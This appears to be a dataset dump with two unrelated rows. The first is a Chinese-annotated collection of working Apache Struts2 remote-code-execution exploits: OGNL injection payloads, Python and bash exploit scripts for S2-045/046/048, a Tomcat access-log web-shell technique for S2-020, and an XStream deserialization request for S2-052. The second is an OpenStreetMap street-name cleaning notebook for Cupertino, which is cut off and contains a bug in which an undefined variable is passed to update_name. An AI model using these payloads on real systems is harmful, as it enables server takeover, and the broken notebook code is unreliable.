text
stringlengths 256
65.5k
|
|---|
[+]1 S2-005 CVE-2010-1870
CVE-2010-1870 影响版本:Struts 2.0.0 – Struts 2.1.8.1 官方公告:http://struts.apache.org/release/2.2.x/docs/s2-005.html
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43mycmd\75\'aaaaaaaaaaaaaaaaaaa\'')(d))&(h)(('\43myret\[email protected]@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\[email protected]@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
[+]2 S2-009 CVE-2011-3923
CVE-2011-3923 影响版本:Struts 2.0.0 - Struts 2.3.1.1 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-009.html
class.classLoader.jarPath=(#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+#_memberAccess["allowStaticMethodAccess"]=true,+#[email protected]@getRuntime().exec('aaaaaaaaaaaaaaaaaaa').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[50000],#c.read(#d),#[email protected]@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())(meh)&z[(class.classLoader.jarPath)('meh')]
[+]3 S2-013 CVE-2013-1966
CVE-2013-1966 影响版本:Struts 2.0.0 – Struts 2.3.14 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-013.html
a=1${(#_memberAccess["allowStaticMethodAccess"]=true,#[email protected]@getRuntime().exec('aaaaaaaaaaaaaaaaaaa').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[50000],#c.read(#d),#[email protected]@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}
[+]4 S2-016 CVE-2013-2251
CVE-2013-2251 影响版本:Struts 2.0.0 – Struts 2.3.15 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-016.html
redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('aaaaaaaaaaaaaaaaaaa'.toString().split('\\s'))).start().getInputStream()).useDelimiter('\\AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()}
[+]5 S2-019 CVE-2013-4316
CVE-2013-4316 影响版本:Struts 2.0.0 – Struts 2.3.15.1
官方公告:http://struts.apache.org/release/2.3.x/docs/s2-019.html
debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'aaaaaaaaaaaaaaaaaaa'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()
[+]6 S2-020 CVE-2014-0094
CVE-2014-0094 影响版本:Struts 2.0.0 – Struts 2.3.16 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-020.html
1.更改属性:
?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
2.访问下面的url来触发tomcat切换log(这里有个坑,这个属性必须是数字,这里设定为1),那么从此开始tomcat的access log将被记录入 webapps/ROOT/shell1.jsp中
?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1
3.通过发包访问下面的请求,在access log中植入代码
/aaaa.jsp?a=<%Runtime.getRuntime().exec("calc");%>
4.结合前面设定的参数,访问下面的url,观察shell执行
http://127.0.0.1/shell1.jsp
[+]7 S2-032 CVE-2016-3081
CVE-2016-3081 影响版本:Struts 2.3.18 – Struts 2.3.28 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-032.html
?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=aaaaaaaaaaaaaaaaaaa&pp=%5C%5CA&ppp=%20&encoding=UTF-8
[+]8 S2-037 CVE-2016-4438
影响版本:Struts 2.3.20 - Struts 2.3.28.1 官方公告:http://struts.apache.org/docs/s2-037.html
/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=aaaaaaaaaaaaaaaaaaa
[+]9 devMode CVE-xxxx-xxxx
?debug=browser&object=(#[email protected]@DEFAULT_MEMBER_ACCESS)?(#context[#parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=aaaaaaaaaaaaaaaaaaa
[+] S2-045 CVE-2017-5638
Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts 2.5.10
import requests
import sys
header = dict()
header['Content-Type'] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
result = requests.get(sys.argv[1], headers=header)
print result.content
[+] S2-046 CVE-2017-5638
Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本
#!/bin/bash
url=$1
cmd=$2
shift
shift
boundary="---------------------------735323031399963166993862150"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")
printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@
[+] S2-048 CVE-2017-9791
影响版本:Struts 2.3.x系列中的showcase应用
#!/usr/bin/python
#coding=utf-8
'''
s2-048 poc
'''
import urllib
import urllib2
def post(url, data):
req = urllib2.Request(url)
data = urllib.urlencode(data)
#enable cookie
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
response = opener.open(req, data)
return response.read()
def main():
posturl = "http://www.test.com/struts2-showcase/integration/saveGangster.action"
data = {'name':"${(#dm=@\u006Fgnl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#ef='echo s2-048-EXISTS').(#iswin=(@\u006Aava.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#efe=(#iswin?{'cmd.exe','/c',#ef}:{'/bin/bash','-c',#ef})).(#p=new \u006Aava.lang.ProcessBuilder(#efe)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}", 'age':'bbb', '__checkbox_bustedBefore':'true', 'description':'ccc'}
res = post(posturl, data)[:100]
if 's2-048-EXISTS' in res:
print posturl, 's2-048 EXISTS'
else:
print posturl, 's2-048 do not EXISTS'
if __name__ == '__main__':
main()
[+] S2-052 CVE-2017-9805
影响版本:Struts 2.5 - Struts 2.5.12
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857AlFFAF61FF24AlFBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 b Content-Type: application/xml
Content-Length: 1663
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: 3SESSI0NID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class=ucom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource
class=Mcom.sun.xml.internal.ws
.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIteratoru/> <next class="java.lang.ProcessBuilder"> <command> <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method>
<class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class=ustring">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStreamM/> <ibufferx/ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value>
</jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.Nativestring reference?"/jdk.nashorn.internal.objects.NativeString’7>〈/entry> <entry>
<jdk.nashorn.internal.objects.Nativestring reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.Nativestring reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
|
OpenStreetMap is a community built free editable map of the world, inspired by the success of Wikipedia where crowdsourced data is open and free from proprietary restricted use. We see some examples of its use by Craigslist and Foursquare, as an open source alternative to Google Maps.
Users can map things such as polylines of roads, draw polygons of buildings or areas of interest, or insert nodes for landmarks. These map elements can be further tagged with details such as street addresses or amenity type. Map data is stored in an XML format. More details about the OSM XML can be found here:
Some highlights of the OSM XML format relevent to this project are:
- OSM XML is list of instances of data primatives (nodes, ways, and relations) found within a given bounds- nodes represent dimensionless points on the map- ways contain node references to form either a polyline or polygon on the map- nodes and ways both contain children tag elements that represent key value pairs of descriptive information about a given node or way
As with any user generated content, there is likely going to be dirty data. In this project I'll attempt to do some auditing, cleaning, and data summarizing tasks with Python and MongoDB.
Chosen Map Area
For this project, I chose to ~50MB from the Cupertino, West San Jose Area. I grew up in Cupertino and lived through the tech sprawl of Apple and the Asian/Indian gentrification of the area. I figured that my familiarity with the area and intrinsic interest in my hometown makes it a good candidate for analysis.
from IPython.display import HTML
HTML('<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://www.openstreetmap.org/export/embed.html?bbox=-122.1165%2C37.2571%2C-121.9060%2C37.3636&layer=mapnik"></iframe><br/><small><a href="http://www.openstreetmap.org/#map=12/37.3105/-122.0135" target="_blank">View Larger Map</a></small>')
I used the Overpass API to download the OpenStreetMap XML for the corresponding bounding box:
import requests
url = 'http://overpass-api.de/api/map?bbox=-122.1165%2C37.2571%2C-121.9060%2C37.3636'
filename = 'cupertino_california.osm'
Python's Requests library is pretty awesome for downloading this dataset, but it unfortunately keeps all the data in memory by default. Since we're using a much larger dataset, we overcome this limitation with this modified procedure from this stackoverflow post:
def download_file(url, local_filename):
# stream = True allows downloading of large files; prevents loading entire file into memory
r = requests.get(url, stream=True)
with open(local_filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
download_file(url, filename)
Auditing the Data
With the OSM XML file downloaded, lets parse through it with ElementTree and count the number of unique element types. Iterative parsing is utilized since the XML is too large to process in memory.
import xml.etree.ElementTree as ET
import pprint
tags = {}
for event, elem in ET.iterparse(filename):
if elem.tag in tags: tags[elem.tag] += 1
else: tags[elem.tag] = 1
pprint.pprint(tags)
{'bounds': 1,
'member': 6644,
'meta': 1,
'nd': 255022,
'node': 214642,
'note': 1,
'osm': 1,
'relation': 313,
'tag': 165782,
'way': 28404}
Here I have built three regular expressions: lower, lower_colon, and problemchars.
- lower: matches strings containing lower case characters- lower_colon: matches strings containing lower case characters and a single colon within the string- problemchars: matches characters that cannot be used within keys in MongoDBHere is a sample of OSM XML:
<node id="266587529" lat="37.3625767" lon="-122.0251570" version="4" timestamp="2015-03-30T03:17:30Z" changeset="29840833" uid="2793982" user="Dhruv Matani">
<tag k="addr:city" v="Sunnyvale"/>
<tag k="addr:housenumber" v="725"/>
<tag k="addr:postcode" v="94086"/>
<tag k="addr:state" v="California"/>
<tag k="addr:street" v="South Fair Oaks Avenue"/>
<tag k="amenity" v="restaurant"/>
<tag k="cuisine" v="indian"/>
<tag k="name" v="Arka"/>
<tag k="opening_hours" v="10am - 2:30pm and 5:00pm - 10:00pm"/>
<tag k="takeaway" v="yes"/>
</node>
Within the node element there are ten tag children. The key for half of these children begin with addr:. Later in this notebook I will use the lower_colon regex to help find these keys so I can build a single address document within a larger json document.
import re
lower = re.compile(r'^([a-z]|_)*$')
lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')
def key_type(element, keys):
if element.tag == "tag":
for tag in element.iter('tag'):
k = tag.get('k')
if lower.search(k):
keys['lower'] += 1
elif lower_colon.search(k):
keys['lower_colon'] += 1
elif problemchars.search(k):
keys['problemchars'] += 1
else:
keys['other'] += 1
return keys
def process_map(filename):
keys = {"lower": 0, "lower_colon": 0, "problemchars": 0, "other": 0}
for _, element in ET.iterparse(filename):
keys = key_type(element, keys)
return keys
keys = process_map(filename)
pprint.pprint(keys)
{'lower': 78267, 'lower_colon': 83553, 'other': 3962, 'problemchars': 0}
Now lets redefine process_map to build a set of unique userid's found within the XML. I will then output the length of this set, representing the number of unique users making edits in the chosen map area.
def process_map(filename):
users = set()
for _, element in ET.iterparse(filename):
for e in element:
if 'uid' in e.attrib:
users.add(e.attrib['uid'])
return users
users = process_map(filename)
len(users)
534
Problems with the Data
Street Names
The majority of this project will be devoted to auditing and cleaning street names seen within the OSM XML. Street types used by users in the process of mapping are quite often abbreviated. I will attempt to find these abbreviations and replace them with their full text form. The plan of action is as follows:
- Build a regex to match the last token in a string (with an optional '.') as this is typically where you would find the street type in an address- Build a list of expected street types that do not need to be cleaned- Parse through the XML looking for tag elements with k="addr:street" attributes- Perform a search using the regex on the value of the v attribute of these elements (the street name string)- Build a dictionary with keys that are matches to the regex (street types) and a set of street names where the particular key was found as the value. This will allow us to determine what needs to be cleaned.- Build a second dictionary that contains a map from an offending street type to a clean street type- Build a second regex that will match these offending street types anywhere in a string- Build a function that will return a clean string using the mapping dictionary and this second regex
The first step is to build a regex to match the last token in a string optionally ending with a period. I will also build a list of street types I expect to see in a clean street name.
from collections import defaultdict
street_type_re = re.compile(r'\b\S+\.?$', re.IGNORECASE)
expected_street_types = ["Avenue", "Boulevard", "Commons", "Court", "Drive", "Lane", "Parkway",
"Place", "Road", "Square", "Street", "Trail"]
The audit_street_type function will take in the dictionary of street types we are building, a string to audit, a regex to match against that string, and the list of expected street types.
The function will search the string for the regex. If there is a match and the match is not in our list of expected street types, add the match as a key to the dictionary and add the string to the set.
def audit_street_type(street_types, street_name, regex, expected_street_types):
m = regex.search(street_name)
if m:
street_type = m.group()
if street_type not in expected_street_types:
street_types[street_type].add(street_name)
The function is_street_name determines if an element contains an attribute k="addr:street". Lets use is_street_name as the tag_filter when I call the audit function to audit street names.
def is_street_name(elem):
return (elem.attrib['k'] == "addr:street")
Now I will define an audit function to do the parsing and auditing of the street names.
I have defined this function so that it not only audits tag elements where k="addr:street", but whichever tag elements match the tag_filter function. The audit function also takes in a regex and the list of expected matches.
def audit(osmfile, regex):
osm_file = open(osmfile, "r")
street_types = defaultdict(set)
# iteratively parse the mapping xml
for event, elem in ET.iterparse(osm_file, events=("start",)):
# iterate 'tag' tags within 'node' and 'way' tags
if elem.tag == "node" or elem.tag == "way":
for tag in elem.iter("tag"):
if is_street_name(tag):
audit_street_type(street_types, tag.attrib['v'], regex, expected_street_types)
return street_types
Now lets pretty print the output of audit
street_types = audit(filename, street_type_re)
pprint.pprint(dict(street_types))
{'Alameda': set(['The Alameda']),
'Ave': set(['Afton Ave',
'Blake Ave',
'Cabrillo Ave',
'N Blaney Ave',
'Saratoga Ave',
'The Alameda Ave']),
'Bascom': set(['S. Bascom']),
'Bellomy': set(['Bellomy']),
'Blvd': set(['De Anza Blvd', 'Stevens Creek Blvd']),
'Circle': set(['Bobolink Circle',
'Calabazas Creek Circle',
'Continental Circle',
'Winchester Circle']),
'Dr': set(['Linwood Dr']),
'East': set(['Vanderbilt Court East']),
'Escuela': set(['Camina Escuela']),
'Franklin': set(['Franklin']),
'Ln': set(['Weyburn Ln']),
'Loop': set(['Infinite Loop']),
'Presada': set(['Paseo Presada']),
'Rd': set(['Bollinger Rd', 'Homestead Rd', 'Saratoga Los Gatos Rd']),
'Real': set(['E El Camino Real', 'East El Camino Real', 'El Camino Real']),
'Row': set(['Santana Row']),
'St': set(['Monroe St']),
'Terrace': set(['Avon Terrace',
'Avoset Terrace',
'Devona Terrace',
'Hobart Terrace',
'Hogarth Terrace',
'Lautrec Terrace',
'Lessing Terrace',
'Manet Terrace',
'Oak Point Terrace',
'Panache Terrace',
'Pennyroyal Terrace',
'Pine Pass Terrace',
'Pistachio Terrace',
'Pumpkin Terrace',
'Pyracantha Terrace',
'Reston Terrace',
'Riorden Terrace',
'Springfield Terrace',
'Wilmington Terrace',
'Windsor Terrace',
'Wright Terrace',
'Yellowstone Terrace']),
'Way': set(['Allison Way',
'Anaconda Way',
'Barnsley Way',
'Belfry Way',
'Belleville Way',
'Bellingham Way',
'Berwick Way',
'Big Basin Way',
'Blanchard Way',
'Bonneville Way',
'Brahms Way',
'Carlisle Way',
'Cheshire Way',
"Coeur D'Alene Way",
'Colinton Way',
'Connemara Way',
'Dartshire Way',
'Devonshire Way',
'Dorset Way',
'Dublin Way',
'Duncardine Way',
'Dunholme Way',
'Dunnock Way',
'Durshire Way',
'Edmonds Way',
'Enderby Way',
'Fife Way',
'Firebird Way',
'Flamingo Way',
'Flicker Way',
'Flin Way',
'Golden Way',
'Harney Way',
'Humewick Way',
'Kingfisher Way',
'Lennox Way',
'Locksunart Way',
'Longfellow Way',
'Mallard Way',
'Miette Way',
'Mitty Way',
'Nandina Way',
'Nelson Way',
'Prince Edward Way',
'Pyrus Way',
'Radcliff Way',
'Revelstoke Way',
'Tangerine Way',
'Tartarian Way',
'Ward Way',
'Zinfandel Way']),
'West': set(['Vanderbilt Court West']),
'Winchester': set(['Winchester'])}
Now I have a list of some abbreviated street types (as well as locations without street types). This is by no means a comprehensive list of all of the abbreviated street types used within the XML as all of these matches occur only as the last token at the end of a street name, but it is a very good first swipe at the problem.
To replace these abbreviated street types, I will define an update function that takes a string to update, a mapping dictionary, and a regex to search.
def update_name(name, mapping, regex):
m = regex.search(name)
if m:
street_type = m.group()
if street_type in mapping:
name = re.sub(regex, mapping[street_type], name)
return name
Using the results of audit, I will build a dictionary to map abbreviations to their full, clean representations.
street_type_mapping = {'Ave' : 'Avenue',
'Blvd' : 'Boulevard',
'Dr' : 'Drive',
'Ln' : 'Lane',
'Pkwy' : 'Parkway',
'Rd' : 'Road',
'St' : 'Street'}
I now want to replace the keys of the map anywhere in the string. I'll build a new regex to do so.
# The pipe will cause the regex to search for any of the keys, lazily matching the first it finds
street_type_re = re.compile(r'\b\S+\.?$', re.IGNORECASE)
To see how this works, I will traverse the street_types dictionary from above
for street_type, ways in street_types.iteritems():
for name in ways:
better_name = update_name(name, street_type_mapping, street_type_re)
print name, "=>", better_name
El Camino Real => El Camino RealE El Camino Real => E El Camino RealEast El Camino Real => East El Camino RealS. Bascom => S. BascomBellomy => BellomyWinchester => WinchesterWeyburn Ln => Weyburn LaneLinwood Dr => Linwood DriveFranklin => FranklinMonroe St => Monroe StreetBollinger Rd => Bollinger RoadSaratoga Los Gatos Rd => Saratoga Los Gatos RoadHomestead Rd => Homestead RoadVanderbilt Court East => Vanderbilt Court EastRiorden Terrace => Riorden TerraceYellowstone Terrace => Yellowstone TerraceSpringfield Terrace => Springfield TerraceOak Point Terrace => Oak Point TerraceWindsor Terrace => Windsor TerraceLessing Terrace => Lessing TerraceAvon Terrace => Avon TerraceHobart Terrace => Hobart TerraceWright Terrace => Wright TerraceHogarth Terrace => Hogarth TerraceManet Terrace => Manet TerracePyracantha Terrace => Pyracantha TerracePistachio Terrace => Pistachio TerraceWilmington Terrace => Wilmington TerraceAvoset Terrace => Avoset TerraceLautrec Terrace => Lautrec TerraceDevona Terrace => Devona TerracePennyroyal Terrace => Pennyroyal TerracePanache Terrace => Panache TerracePumpkin Terrace => Pumpkin TerraceReston Terrace => Reston TerracePine Pass Terrace => Pine Pass TerraceFirebird Way => Firebird WayDublin Way => Dublin WayFlicker Way => Flicker WayAnaconda Way => Anaconda WayTartarian Way => Tartarian WayBarnsley Way => Barnsley WayTangerine Way => Tangerine WayBlanchard Way => Blanchard WayFife Way => Fife WayFlamingo Way => Flamingo WayEdmonds Way => Edmonds WayLocksunart Way => Locksunart WayRevelstoke Way => Revelstoke WayEnderby Way => Enderby WayCheshire Way => Cheshire WayColinton Way => Colinton WayDorset Way => Dorset WayBerwick Way => Berwick WayRadcliff Way => Radcliff WayBrahms Way => Brahms WayDunholme Way => Dunholme WayDurshire Way => Durshire WayLongfellow Way => Longfellow WayNandina Way => Nandina WayDunnock Way => Dunnock WayCarlisle Way => Carlisle WayMitty Way => Mitty WayHarney Way => Harney WayDevonshire Way => Devonshire WayBelfry Way => Belfry WayPrince Edward Way => Prince Edward WayPyrus Way => Pyrus WayGolden Way => Golden WayWard Way => Ward WayKingfisher Way => Kingfisher WayConnemara Way => Connemara WayAllison Way => Allison WayFlin Way => Flin WayNelson Way => Nelson WayBellingham Way => Bellingham WayMallard Way => Mallard WayHumewick Way => Humewick WayBig Basin Way => Big Basin WayCoeur D'Alene Way => Coeur D'Alene WayBelleville Way => Belleville WayDuncardine Way => Duncardine WayBonneville Way => Bonneville WayMiette Way => Miette WayZinfandel Way => Zinfandel WayLennox Way => Lennox WayDartshire Way => Dartshire WayVanderbilt Court West => Vanderbilt Court WestDe Anza Blvd => De Anza BoulevardStevens Creek Blvd => Stevens Creek BoulevardBlake Ave => Blake AvenueThe Alameda Ave => The Alameda AvenueSaratoga Ave => Saratoga AvenueAfton Ave => Afton AvenueN Blaney Ave => N Blaney AvenueCabrillo Ave => Cabrillo AvenueWinchester Circle => Winchester CircleCalabazas Creek Circle => Calabazas Creek CircleContinental Circle => Continental CircleBobolink Circle => Bobolink CircleSantana Row => Santana RowThe Alameda => The AlamedaPaseo Presada => Paseo PresadaInfinite Loop => Infinite LoopCamina Escuela => Camina Escuela
Looks like the abbreviated street types updated as expected.
Upon closer inspection, I see another problem: cardinal directions. North, South, East, and West appear to be universally abbreviated. Lets apply similar techniques to replace these abbreviated cardinal directions.
First, I will create a new regex matching the set of characters NSEW at the beginning of a string, followed by an optional period
street_type_pre = re.compile(r'^[NSEW]\b\.?', re.IGNORECASE)
To audit, I can use the same function with this new regex
cardinal_directions = audit(filename, street_type_pre)
pprint.pprint(dict(cardinal_directions))
{'E': set(['E El Camino Real']),
'N': set(['N Blaney Ave']),
'S.': set(['S. Bascom'])}
Looks like we found E, N, S, W, and W. at beginning of the street names. Informative, but I can just create an exhaustive mapping for this issue
cardinal_mapping = {'E' : 'East',
'E.' : 'East',
'N' : 'North',
'N.' : 'North',
'S' : 'South',
'S.' : 'South',
'W' : 'West',
'W.' : 'West'}
Finally, I will traverse the cardinal_directions dictionary and apply the updates for both street type and cardinal direction
for cardinal_direction, ways in cardinal_directions.iteritems():
if cardinal_direction in cardinal_mapping:
for name in ways:
better_name = update_name(name, street_type_mapping, street_type_re)
best_name = update_name(better_name, cardinal_mapping, street_type_pre)
print name, "=>", better_name, "=>", best_name
E El Camino Real => E El Camino Real => East El Camino RealS. Bascom => S. Bascom => South BascomN Blaney Ave => N Blaney Avenue => North Blaney Avenue
Preparing for MongoDB
To load the XML data into MongoDB, I will have to transform the data into json documents structured like this:
{
"id": "2406124091",
"type: "node",
"visible":"true",
"created": {
"version":"2",
"changeset":"17206049",
"timestamp":"2013-08-03T16:43:42Z",
"user":"linuxUser16",
"uid":"1219059"
},
"pos": [41.9757030, -87.6921867],
"address": {
"housenumber": "5157",
"postcode": "60625",
"street": "North Lincoln Ave"
},
"amenity": "restaurant",
"cuisine": "mexican",
"name": "La Cabana De Don Luis",
"phone": "1 (773)-271-5176"
}
The transform will follow these rules:
- Process only 2 types of top level tags: node and way- All attributes of node and way should be turned into regular key/value pairs, except: - The following attributes should be added under a key created: version, changeset, timestamp, user, uid - Attributes for latitude and longitude should be added to a pos array, for use in geospacial indexing. Make sure the values inside pos array are floats and not strings.- If second level tag "k" value contains problematic characters, it should be ignored- If second level tag "k" value starts with "addr:", it should be added to a dictionary address- If second level tag "k" value does not start with "addr:", but contains ":", you can process it same as any other tag.- If there is a second ":" that separates the type/direction of a street, the tag should be ignored, for example:
<tag k="addr:housenumber" v="5158"/> <tag k="addr:street" v="North Lincoln Avenue"/> <tag k="addr:street:name" v="Lincoln"/> <tag k="addr:street:prefix" v="North"/> <tag k="addr:street:type" v="Avenue"/> <tag k="amenity" v="pharmacy"/>
should be turned into:
{
"address": {
"housenumber": 5158,
"street": "North Lincoln Avenue"
},
"amenity": "pharmacy"
}
For "way" specifically:
<nd ref="305896090"/> <nd ref="1719825889"/>
should be turned into:
{
"node_refs": ["305896090", "1719825889"]
}
To do this transformation, lets define a function shape_element that processes an element. Within this function I will use the update function with the regexes and mapping dictionaries defined above to clean street addresses. Additionally, I will store timestamp as a Python datetime rather than as a string. The format of the timestamp can be found here:
from datetime import datetime
CREATED = ["version", "changeset", "timestamp", "user", "uid"]
def shape_element(element):
node = {}
if element.tag == "node" or element.tag == "way" :
node['type'] = element.tag
# Parse attributes
for attrib in element.attrib:
# Data creation details
if attrib in CREATED:
if 'created' not in node:
node['created'] = {}
if attrib == 'timestamp':
node['created'][attrib] = datetime.strptime(element.attrib[attrib], '%Y-%m-%dT%H:%M:%SZ')
else:
node['created'][attrib] = element.get(attrib)
# Parse location
if attrib in ['lat', 'lon']:
lat = float(element.attrib.get('lat'))
lon = float(element.attrib.get('lon'))
node['pos'] = [lat, lon]
# Parse the rest of attributes
else:
node[attrib] = element.attrib.get(attrib)
# Process tags
for tag in element.iter('tag'):
key = tag.attrib['k']
value = tag.attrib['v']
if not problemchars.search(key):
# Tags with single colon and beginning with addr
if lower_colon.search(key) and key.find('addr') == 0:
if 'address' not in node:
node['address'] = {}
sub_attr = key.split(':')[1]
if is_street_name(tag):
# Do some cleaning
better_name = update_name(name, street_type_mapping, street_type_re)
best_name = update_name(better_name, cardinal_mapping, street_type_pre)
node['address'][sub_attr] = best_name
else:
node['address'][sub_attr] = value
# All other tags that don't begin with "addr"
